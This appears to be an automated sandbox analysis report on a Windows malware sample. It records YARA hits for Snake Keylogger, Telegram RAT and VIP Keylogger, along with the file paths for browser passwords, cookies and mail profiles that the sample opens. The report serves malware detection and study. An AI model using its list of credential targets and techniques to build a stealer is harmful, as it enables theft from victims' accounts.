              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C51663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00C51663
              Source: DSD876543456780000.exe, chordates.exe.0.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: DSD876543456780000.exe, chordates.exeBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C10698 cpuid 0_2_00C10698
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,3_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,6_2_00417A20
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: unknown VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C68195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00C68195
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C4D27A GetUserNameW,0_2_00C4D27A
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C2B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_00C2B952
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
              Yara detected VIP Keylogger
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: chordates.exeBinary or memory string: WIN_81
              Source: chordates.exeBinary or memory string: WIN_XP
              Source: chordates.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: chordates.exeBinary or memory string: WIN_XPe
              Source: chordates.exeBinary or memory string: WIN_VISTA
              Source: chordates.exeBinary or memory string: WIN_7
              Source: chordates.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected Snake Keylogger
              Source: Yara matchFile source: 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Yara detected Telegram RAT
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
              Yara detected VIP Keylogger
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5260, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6024, type: MEMORYSTR
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C71204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00C71204
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C71806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00C71806
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EE1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00EE1204
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00EE1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00EE1806

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information111
              Scripting              		2
              Valid Accounts              		1
              Native API              		111
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		1
              OS Credential Dumping              		2
